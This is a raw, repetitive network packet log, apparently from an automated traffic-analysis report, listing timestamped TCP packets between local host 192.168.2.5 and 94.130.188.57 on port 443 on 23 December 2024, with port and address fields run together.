                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569226980 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569247961 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569259882 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569278955 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569289923 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569345951 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569359064 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569369078 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569375038 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569395065 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569401026 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569427013 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569437027 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569453001 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569461107 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569504976 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569519043 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569547892 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569560051 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569571018 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569576979 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569591999 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569600105 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569670916 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569684029 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569708109 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569715977 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569727898 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569746017 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569775105 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569775105 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569792986 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569817066 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569833040 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569854021 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569895029 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569952011 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.569987059 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.570163965 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.570336103 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.570414066 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.611335993 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647084951 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647186995 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647212982 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647279024 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647310019 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647334099 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647361994 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647387028 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647397041 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647416115 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647424936 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647450924 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.687326908 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.690936089 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.690973043 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.690992117 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.691014051 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.691031933 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.691076994 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.691099882 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.691117048 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.691272020 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.735327005 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738351107 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738385916 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738414049 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738437891 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738486052 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738508940 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738796949 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738850117 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738908052 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.783339024 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.800194979 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.800276995 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.800331116 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.800403118 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.800452948 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.800466061 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.807380915 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.807466984 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.807703972 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.807816982 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.807837963 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.807874918 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.818759918 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819159031 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819246054 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819267988 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819310904 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819370031 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819391966 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819410086 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819464922 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.859340906 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862338066 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862510920 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862526894 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862544060 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862607956 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862632036 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862638950 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862657070 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862703085 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862732887 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862771988 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.903332949 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.918565035 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928095102 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928168058 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928423882 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928452015 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928466082 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928529024 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928632975 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928672075 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.932010889 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.932074070 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.975334883 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.046972036 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.047158003 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.047235012 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.047393084 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.047432899 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.091510057 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.091531038 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.091705084 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.091737986 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.091777086 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.091912031 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.091954947 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.139332056 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.139487982 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.165781021 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.165899992 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.166038990 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.166095972 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.166253090 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.168160915 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.168180943 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.168375969 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.168422937 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.168437004 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.168559074 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.168601036 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.168608904 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.169830084 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.169949055 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.169984102 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.170118093 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.170157909 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.170206070 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.170325994 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.170356989 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.170639038 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.171078920 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.171140909 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.171286106 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.171360970 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.171560049 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.171591043 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.219329119 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.219455957 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.262717009 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.262834072 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.262947083 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.262995958 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.263019085 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.263191938 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.263223886 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.285310030 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.285449028 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.285665989 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.285712004 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.285732985 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.285835028 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.285939932 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.285981894 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.287652969 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.287815094 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.287962914 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.288009882 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.288012981 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.288038015 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.288147926 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.289433002 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.289546967 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.289676905 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.289725065 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.289729118 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.289758921 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.289764881 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.289982080 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.290011883 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.291268110 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.291367054 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.291497946 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.291538954 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.291538954 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.291563034 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.292820930 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.292884111 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.292908907 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.292953968 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.293288946 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.293447971 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.293525934 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.293906927 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.293920040 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.294261932 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.294318914 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.294353962 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.294378996 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.294589043 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.294610023 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.294946909 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.295526028 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.295567036 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.295660019 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297353029 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297437906 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297485113 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297523022 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297585964 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297596931 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297615051 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297646999 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297687054 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297709942 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297724009 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297755957 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297776937 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297817945 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298022985 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298146009 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298180103 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298265934 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298290968 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298341990 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298435926 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298455000 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298553944 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298572063 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298592091 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298650980 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298671007 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298712015 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298722029 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298747063 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298763037 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298777103 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298810005 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.299144983 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.327651978 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.327814102 CET50015443192.168.2.594.130.188.57
